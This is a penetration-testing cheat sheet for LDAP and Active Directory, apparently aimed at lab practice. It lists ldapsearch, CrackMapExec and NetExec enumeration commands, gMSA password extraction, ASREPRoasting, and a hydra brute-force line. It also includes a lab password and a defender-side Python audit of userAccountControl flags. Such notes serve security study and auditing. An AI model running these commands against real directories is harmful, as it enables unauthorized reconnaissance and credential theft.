389) LDAP
GUI: JXplorer
General enumeration
# -x Simple Authentication
# -D Bind DN (user name)
# -w Password
# -b Search base (base DN)
## ------------------| Simple Auth
ldapsearch -x -H ldap://<IP>
## ------------------| Get LDAP Naming Context (DN)
ldapsearch -x -s base namingcontexts -H ldap://<IP>
## ------------------| Enum
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://<IP>
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://<IP> -D '<DOMAIN>\<USER>' -w 'PassWord'
ldapsearch -x -b "DC=<SUBDOMAIN>,DC=<TDL>" -H ldap://<IP> -D '<DOMAIN>\ldap' -w 'PassWord'
## ------------------| Queries
ldapsearch -x -H ldap://<IP> -b "DC=htb,DC=local" '(objectClass=Person)'
ldapsearch -x -H ldap://<IP> -b "DC=htb,DC=local" '(objectClass=User)' sAMAccountName | grep sAMAccountName
## ------------------| Grep only domain admins
ldapsearch -x -H ldap://<IP> -b "DC=HTB,DC=LOCAL" -D '<DOMAIN>\<USER>' -w 'Ashare1972' "(&(ObjectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=htb,DC=local))" | grep sAMAccountName
## ------------------| Extract users
-b "CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"
## ------------------| Extract computers
-b "CN=Computers,DC=<SUBDOMAIN>,DC=<TDL>"
## ------------------| Extract self info
-b "CN=<MY NAME>,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"
## ------------------| Extract Domain Admins
-b "CN=Domain Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"
## ------------------| Extract Domain Users
-b "CN=Domain Users,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"
## ------------------| Extract Enterprise Admins
-b "CN=Enterprise Admins,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"
## ------------------| Extract Administrators
-b "CN=Administrators,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>"
## ------------------| Extract Remote Desktop Group
-b "CN=Remote Desktop Users,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>"
Enumerate password policy.
crackmapexec smb 10.10.10.161 --pass-pol
# Null authentication
crackmapexec smb 10.10.10.161 --pass-pol -u '' -p ''
NetExec Enumeration
## ------------------| Test if an account exists without Kerberos protocol
nxc ldap <TARGET_IP> -u users.txt -p '' -k
## ------------------| Enumerate All Users
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --users
## ------------------| Enumerate Active Users
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --active-users
## ------------------| Enumerate Computers
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M find-computer
## ------------------| Enumerate Domain Admins
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Domain Admins'
## ------------------| Enumerate Domain Users
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Domain Users'
## ------------------| Enumerate Enterprise Admins
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Enterprise Admins'
## ------------------| Enumerate Administrators
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Administrators'
## ------------------| Enumerate Remote Desktop Users
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M group-mem -o GROUP='Remote Desktop Users'
## ------------------| Extract Self Information
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M whoami
## ------------------| Enumerate Users Trusted for Delegation
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --trusted-for-delegation
## ------------------| Enumerate Users with the PASSWD_NOTREQD Flag (Password Not Required)
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --password-not-required
## ------------------| Enumerate Accounts with Admin Count
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --admin-count
## ------------------| Enumerate Group Memberships
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M groupmembership -o USER='<TARGET_USER>'
## ------------------| Enumerate Subnets
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M subnets
## ------------------| Enumerate Domain Trusts
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M enum_trusts
## ------------------| Check LDAP Signing Requirements
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' -M ldap-checker
## ------------------| Extract Group Managed Service Account (gMSA) Passwords
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '<PASSWORD>' --gmsa
## ------------------| Perform ASREPRoasting Attack
nxc ldap <TARGET_IP> -u '<USERNAME>' -p '' --asreproast <OUTPUT_FILE>
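Added example (not from the original notes or from the NetExec project): a defender-side audit that reads ldapsearch LDIF output and reports enabled accounts carrying the userAccountControl bits that `--password-not-required`, `--trusted-for-delegation` and `--asreproast` look for. The function names, the sample entries and the choice to skip disabled accounts by default are assumptions of this example.

```python
import base64, re

UAC_FLAGS = {  # userAccountControl bits (Microsoft-documented values)
    0x00000020: "PASSWD_NOTREQD",          # --password-not-required
    0x00080000: "TRUSTED_FOR_DELEGATION",  # --trusted-for-delegation
    0x00400000: "DONT_REQ_PREAUTH",        # --asreproast
}

def parse_ldif(text):
    """Yield one dict per LDIF entry; handles folded lines and base64 ('::') values."""
    text = re.sub(r"\r?\n ", "", text)  # unfold continuation lines
    for block in re.split(r"\n\s*\n", text):
        entry = {}
        for line in block.splitlines():
            if line.startswith("#") or ":" not in line:
                continue
            name, _, value = line.partition(":")
            if value.startswith(":"):  # "attr:: <base64>"
                value = base64.b64decode(value[1:]).decode("utf-8", "replace")
            entry.setdefault(name.lower(), []).append(value.strip())
        if entry:
            yield entry

def audit(text, include_disabled=False):
    """Map sAMAccountName -> tracked flag names set on that account."""
    findings = {}
    for e in parse_ldif(text):
        if "useraccountcontrol" not in e or "samaccountname" not in e:
            continue  # ldapsearch trailer lines, groups, OUs
        uac = int(e["useraccountcontrol"][0])
        if uac & 0x2 and not include_disabled:  # ACCOUNTDISABLE
            continue
        hits = [name for bit, name in UAC_FLAGS.items() if uac & bit]
        if hits:
            findings[e["samaccountname"][0]] = hits
    return findings

# Constructed sample in ldapsearch LDIF form (not from a real directory)
SAMPLE = """\
dn: CN=svc_sql,CN=Users,DC=htb,DC=local
sAMAccountName: svc_sql
userAccountControl: 4260352

dn: CN=kiosk,CN=Users,DC=htb,DC=local
sAMAccountName: kiosk
userAccountControl: 544

dn: CN=WEB01,CN=Computers,DC=htb,DC=local
sAMAccountName: WEB01$
userAccountControl: 528384"""
```

Calling `audit()` on saved ldapsearch output that includes the sAMAccountName and userAccountControl attributes gives a per-account list to review; domain controllers normally carry TRUSTED_FOR_DELEGATION and will appear in it.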
Brute Force
hydra -l UserName -P Passwordlist <IP> ldap2 -V -f